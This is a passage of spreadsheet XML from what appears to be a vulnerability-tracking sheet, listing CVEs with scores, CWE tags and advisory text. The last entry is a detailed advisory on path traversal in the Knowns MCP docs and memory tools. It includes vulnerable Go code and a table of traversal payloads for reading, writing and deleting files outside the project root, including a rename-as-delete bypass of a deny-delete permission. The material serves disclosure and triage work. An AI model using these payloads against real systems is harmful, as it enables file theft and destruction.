      <c r="Q377" s="5" t="inlineStr"/>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S377" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in YunaiV/zhijiantianya ruoyi-vue-pro up to 2026.08. Affected by this vulnerability is the function validOAuthClientFromCache of the file yudao-module-system/src/main/java/cn/iocoder/yudao/module/system/service/oauth2/OAuth2ClientServiceImpl.java of the component OAuth2 Client. The manipulation of the argument redirect_uri results in open redirect. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97325</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97366</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr">
        <is>
          <t>react</t>
        </is>
      </c>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q378" s="5" t="inlineStr"/>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S378" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in jhen0409 react-native-debugger up to 0.14.0. The impacted element is the function openDevTools of the file electron/window.js of the component Open in Editor Handler. The manipulation of the argument host results in os command injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97366</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97368</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K379" s="5" t="inlineStr"/>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S379" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in chillzhuang SpringBlade up to 5.0.2. This affects the function UserServiceImpl.userInfo of the file blade-service/blade-system/src/main/java/org/springblade/system/service/impl/UserServiceImpl.java of the component user-auth-info Endpoint. This manipulation of the argument userId causes authorization bypass. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. CVE-2026-56100 and CVE-2026-36765 are distinct issues. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97368</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97648</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-862</t>
        </is>
      </c>
      <c r="S380" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in ningzichun student-management-system up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected is an unknown function. Performing a manipulation results in cross-site request forgery. It is possible to initiate the attack remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97648</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97650</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr">
        <is>
          <t>f5, php, hp</t>
        </is>
      </c>
      <c r="K381" s="5" t="inlineStr"/>
      <c r="L381" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q381" s="5" t="inlineStr"/>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S381" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in ningzichun student-management-system up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this issue is the function echo of the file admin/fun/addLog.php. The manipulation of the argument reason/detail leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97650</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.7 → 2.0)</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97649</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q382" s="5" t="inlineStr"/>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="S382" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in ningzichun student-management-system up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this vulnerability is an unknown functionality of the file example_lite.sql. Executing a manipulation can lead to use of default credentials. It is possible to launch the attack remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97649</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T382"/>
  <conditionalFormatting sqref="E2:E38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382">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2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CVE-2026-92161</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr">
        <is>
          <t>composer:fof/oauth</t>
        </is>
      </c>
      <c r="M2" s="5" t="inlineStr">
        <is>
          <t>1.7.4, 2.0.0-beta.4</t>
        </is>
      </c>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>FriendsOfFlarum OAuth allows users to log in to Flarum with GitHub, Twitter, Facebook, and other providers. Prior to 1.7.4 and 2.0.0-beta.4, the Discord OAuth provider does not check the verified field returned for an OAuth email before passing the address to Flarum core as trusted through provideTrustedEmail(). When Discord sign-in is enabled, an unauthenticated attacker who knows the email address of a Flarum user can configure a Discord account with that unverified address and a verified phone number, then sign in to cause Flarum to match the trusted address, link the attacker-controlled Discord identity to the existing user, and authenticate as the victim without a password or victim interaction. Exploitation requires that the victim's email address is not already associated with a Discord account, and it can compromise administrator accounts. Other bundled providers were not confirmed to be practically exploitable by this method because their relevant authentication flows return only verified or confirmed email addresses. This issue is fixed in versions 1.7.4 and 2.0.0-beta.4.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92161</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100368</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>nuget</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr">
        <is>
          <t>nuget:AlastairLundy.CliInvoke.Specializations, nuget:CliInvoke.Specializations</t>
        </is>
      </c>
      <c r="M3" s="5" t="inlineStr">
        <is>
          <t>2.0.2, 2.10.5, 2.8.5, 2.9.4, 3.0.0-beta.1</t>
        </is>
      </c>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>CliInvoke is a .NET library for invoking command-line programs, and its `CliInvoke.Specializations` packages provide specialized wrappers for shells such as PowerShell and Windows Command Prompt. `CliInvoke.Specializations` versions 2.2.0 through 2.8.4, 2.9.0 through 2.9.3, 2.10.0 through 2.10.4, 3.0.0-alpha.1 through 3.0.0-alpha.4, and 3.0.0-alpha.8 through 3.0.0-alpha.10, as well as `AlastairLundy.CliInvoke.Specializations` versions 1.0.0-rc.1 through 1.6.1.1, contain an OS command injection vulnerability in their PowerShell and Cmd wrappers. The wrappers pass a caller-controlled target and arguments to `pwsh -Command` or `cmd /c` using a single `ProcessStartInfo.Arguments` string, allowing a double quote in untrusted input to break operating-system-level quoting and cause the shell to execute an additional command with the host process's privileges. The vulnerability is patched in `CliInvoke.Specializations` versions 2.8.5, 2.9.4, 2.10.5, and 3.0.0-beta.1, and in `AlastairLundy.CliInvoke.Specializations` version 2.0.2. No complete workaround is available; users unable to upgrade should reject or remove double quotes from target paths and arguments, additionally reject shell metacharacters in versions 2.2.0 through 2.9.2 and 3.0.0-alpha.1 through 3.0.0-alpha.4, or bypass the PowerShell and Cmd wrappers and invoke target processes directly when handling untrusted input.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100368</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100369</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>nuget</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr">
        <is>
          <t>nuget:AlastairLundy.CliInvoke, nuget:CliInvoke</t>
        </is>
      </c>
      <c r="M4" s="5" t="inlineStr">
        <is>
          <t>2.0.2, 2.10.5, 2.8.5, 2.9.4, 3.0.0-beta.2</t>
        </is>
      </c>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>CliInvoke and its formerly named `AlastairLundy.CliInvoke` package are .NET libraries for invoking command-line programs and wrapping executable processes. `CliInvoke` versions 2.0.0 through 2.8.4, 2.9.0 through 2.9.3, 2.10.0 through 2.10.4, and 3.0.0-alpha.1 through 3.0.0-beta.1, as well as `AlastairLundy.CliInvoke` versions 2.0.0-alpha.1 through 2.0.0, contain an argument-injection vulnerability in `RunnerProcessFactory` on the 2.x line and `RunnerConfigurationFactory` on the 3.x line. These factories combine runner arguments, a caller-controlled target, and caller-controlled arguments into one `ProcessStartInfo.Arguments` string, allowing a double quote in the target or an argument to terminate an operating-system-level quoted region and inject unintended elements into the runner’s argument vector, potentially resulting in arbitrary command execution when a shell runner is used. The vulnerability is patched in `CliInvoke` versions 2.8.5, 2.9.4, 2.10.5, and 3.0.0-beta.2, and in `AlastairLundy.CliInvoke` version 2.0.2. No complete workaround is available; users unable to upgrade can partially mitigate the issue by removing double quotes from targets and arguments, additionally removing shell metacharacters when using shell runners, or bypassing the vulnerable factory and constructing a `ProcessConfiguration` with an explicit `ArgumentList`.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100369</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57443</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>pip:scbe-aethermoore</t>
        </is>
      </c>
      <c r="M5" s="5" t="inlineStr">
        <is>
          <t>4.2.1</t>
        </is>
      </c>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>SCBE-AETHE</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57443</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86439</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr"/>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr">
        <is>
          <t>npm:knowns</t>
        </is>
      </c>
      <c r="M6" s="5" t="inlineStr">
        <is>
          <t>0.30.0</t>
        </is>
      </c>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr"/>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>## Overview
Verified. Multiple **Unrestricted Path Traversal** vulnerabilities exist in the Knowns MCP `docs` and `memory` tools, allowing arbitrary file read, write, and deletion operations outside the project sandbox. The storage layer functions (`Get`, `Create`, `Update`, `Rename`, `Delete`) in both `doc_store.go` and `memory_store.go` concatenate user-controlled paths with `filepath.Join()` without any containment validation. 
Additionally, the `docs.update` action with a `newPath` parameter performs a file deletion via `Rename()`, but is classified as `CapWrite` in the permission registry rather than `CapDelete`. This allows an attacker with a `read-write-no-delete` preset to bypass deletion restrictions and destroy arbitrary files outside the project root.
## Affected paths
| File Path | Role | Vulnerability &amp; Execution Impact |
| :--- | :--- | :--- |
| **`internal/storage/doc_store.go`** | Vulnerable Sink (Docs) | **Path Traversal in File Operations (CWE-22):** `Get()`, `Create()`, `Update()`, `Rename()`, `Delete()` join user-controlled `path` with `filepath.Join(ds.docsDir(), ...)` without validating path containment. |
| **`internal/storage/memory_store.go`** | Vulnerable Sink (Memory) | **Path Traversal in Memory Operations (CWE-22):** `GetInLayer()`, `Create()`, `Update()`, `Delete()` join user-controlled `id` with `filepath.Join(dir, models.MemoryFileName(id))` without validation. |
| **`internal/mcp/handlers/doc.go`** | Pass-Through Handler | **Unsanitized Input Propagation:** MCP handlers pass user-supplied `path`, `folder`, `newPath` directly to storage layer without sanitization. |
| **`internal/mcp/handlers/memory.go`** | Pass-Through Handler | **Unsanitized Input Propagation:** MCP handlers pass user-supplied `id` directly to storage layer without sanitization. |
| **`internal/permissions/registry.go`** | Authorization Bypass | **Capability Misclassification (CWE-863):** `docs.update` with `newPath` performs file deletion but is classified as `CapWrite`, bypassing `CapDelete` restrictions. |
## Root Cause
### Missing Path Containment in DocStore
In `internal/storage/doc_store.go`, all file operations use `filepath.Join()` to construct absolute paths without validating that the resolved path remains within `docsDir()`:
```go
// Get retrieves a doc by its relative path (without .md extension).
func (ds *DocStore) Get(path string) (*models.Doc, error) {
    path = strings.TrimPrefix(path, "/")
    path = strings.TrimSuffix(path, ".md")
    // VULNERABLE: No containment check
    absPath := filepath.Join(ds.docsDir(), filepath.FromSlash(path)+".md")
    if _, err := os.Stat(absPath); err == nil {
        // ...
        return ds.parseFile(absPath, path, folder, false, "")
    }
    // ...
}
// Create writes a new doc to .knowns/docs/{path}.md.
func (ds *DocStore) Create(doc *models.Doc) error {
    if doc.Path == "" {
        return fmt.Errorf("doc path is required")
    }
    // VULNERABLE: No containment check
    absPath := filepath.Join(ds.docsDir(), filepath.FromSlash(doc.Path)+".md")
    if err := os.MkdirAll(filepath.Dir(absPath), 0755); err != nil {
        return fmt.Errorf("create doc dir: %w", err)
    }
    return ds.writeFile(absPath, doc)
}
// Rename rewrites a doc to a new path and removes the old file.
func (ds *DocStore) Rename(oldPath string, doc *models.Doc) error {
    // ...
    oldAbsPath := filepath.Join(ds.docsDir(), filepath.FromSlash(strings.TrimSuffix(oldPath, ".md"))+".md")
    newAbsPath := filepath.Join(ds.docsDir(), filepath.FromSlash(strings.TrimSuffix(doc.Path, ".md"))+".md")
    // ...
    if err := ds.writeFile(newAbsPath, doc); err != nil {
        return err
    }
    if oldAbsPath != newAbsPath {
        // VULNERABLE: Deletes file at oldAbsPath (can be outside docsDir)
        if err := os.Remove(oldAbsPath); err != nil &amp;&amp; !os.IsNotExist(err) {
            return err
        }
    }
    return nil
}
// Delete removes a doc file.
func (ds *DocStore) Delete(path string) error {
    path = strings.TrimSuffix(path, ".md")
    // VULNERABLE: No containment check
    absPath := filepath.Join(ds.docsDir(), filepath.FromSlash(path)+".md")
    return os.Remove(absPath)
}
```
**Critical Flaws:**
- `filepath.Join` resolves `../` sequences natively
- No post-Join prefix check (e.g., `strings.HasPrefix(absPath, ds.docsDir())`)
- No rejection of absolute paths or path traversal sequences
- `Rename()` performs file deletion via `os.Remove(oldAbsPath)`, which can target files outside the docs directory
### Missing Path Containment in MemoryStore
In `internal/storage/memory_store.go`, memory operations similarly lack path validation:
```go
// GetInLayer retrieves a memory entry by ID from a specific layer only.
func (ms *MemoryStore) GetInLayer(id, layer string) (*models.MemoryEntry, error) {
    // ...
    dir, err := ms.dirForLayer(layer)
    if err != nil {
        return nil, err
    }
    // VULNERABLE: No containment check for id containing "../"
    absPath := filepath.Join(dir, models.MemoryFileName(id))
    if _, err := os.Stat(absPath); err != nil {
        return nil, fmt.Errorf("memory %q not found in %s layer", id, layer)
    }
    return ms.parseFile(absPath, layer)
}
// Create writes a new memory entry to the appropriate layer directory.
func (ms *MemoryStore) Create(entry *models.MemoryEntry) error {
    // ...
    dir, err := ms.dirForLayer(entry.Layer)
    if err != nil {
        return err
    }
    if err := os.MkdirAll(dir, 0755); err != nil {
        return fmt.Errorf("create memory dir: %w", err)
    }
    // VULNERABLE: No containment check for entry.ID containing "../"
    absPath := filepath.Join(dir, models.MemoryFileName(entry.ID))
    return atomicWrite(absPath, []byte(renderMemory(entry)))
}
// Delete removes a memory entry by ID.
func (ms *MemoryStore) Delete(id string) error {
    // ...
    filename := models.MemoryFileName(id)
    dirs := []string{ms.projectDir(), ms.globalDir()}
    for _, dir := range dirs {
        // VULNERABLE: No containment check
        absPath := filepath.Join(dir, filename)
        if _, err := os.Stat(absPath); err == nil {
            return os.Remove(absPath)
        }
    }
    return fmt.Errorf("memory %q not found", id)
}
```
### Authorization Bypass via Rename-as-Delete
In `internal/mcp/handlers/doc.go`, the `handleDocUpdate()` function accepts a `newPath` parameter that triggers a rename operation:
```go
func handleDocUpdate(getStore func() *storage.Store, req mcp.CallToolRequest) (*mcp.CallToolResult, error) {
    // ...
    if v, ok := stringArg(args, "newPath"); ok &amp;&amp; strings.TrimSpace(v) != "" {
        doc.Path = strings.Trim(strings.TrimSuffix(v, ".md"), "/")
    }
    // ...
    if oldPath != doc.Path {
        if err := store.Docs.Rename(oldPath, doc); err != nil {
            return errFailed("rename doc", err)
        }
        // ...
    }
    // ...
}
```
The `Rename()` function in `doc_store.go` performs file deletion:
```go
if oldAbsPath != newAbsPath {
    if err := os.Remove(oldAbsPath); err != nil &amp;&amp; !os.IsNotExist(err) {
        return err
    }
}
```
However, in `internal/permissions/registry.go`, `docs.update` is classified as `CapWrite`:
```go
"docs.update":  {Capability: CapWrite, Target: TargetDoc, Risk: RiskMedium},
```
This allows an attacker with a `read-write-no-delete` preset (which permits `CapWrite` but denies `CapDelete`) to delete files by using `docs.update` with a `newPath` parameter.
## Attack Vector
| Phase | Request / Action | Effect |
| :--- | :--- | :--- |
| **1. Arbitrary File Read** | `docs.get` with `path="../../../victim/secret"` | Server reads file outside project root via path traversal in `DocStore.Get()`. |
| **2. Arbitrary File Write** | `docs.create` with `folder="../../../victim"` | Server writes file outside project root via path traversal in `DocStore.Create()`. |
| **3. Arbitrary File Delete** | `docs.update` with `path="../outside/secret.md"` and `newPath="../../../victim/renamed.md"` | Server deletes file outside project root via path traversal in `DocStore.Rename()`. Bypasses `CapDelete` restriction because `docs.update` is classified as `CapWrite`. |
| **4. Memory File Read/Write** | `memory.update` with `id="x/../../../../victim/secret"` | Server reads and overwrites file outside project root via path traversal in `MemoryStore.Update()`. |
## Analysis
### Classic Path Traversal Pattern
Both `DocStore` and `MemoryStore` follow the same vulnerable pattern: user-controlled input is concatenated with a base directory using `filepath.Join()`, then passed directly to file system operations (`os.ReadFile`, `os.WriteFile`, `os.Remove`, `os.Stat`) without any validation.
```go
absPath := filepath.Join(baseDir, filepath.FromSlash(userInput))
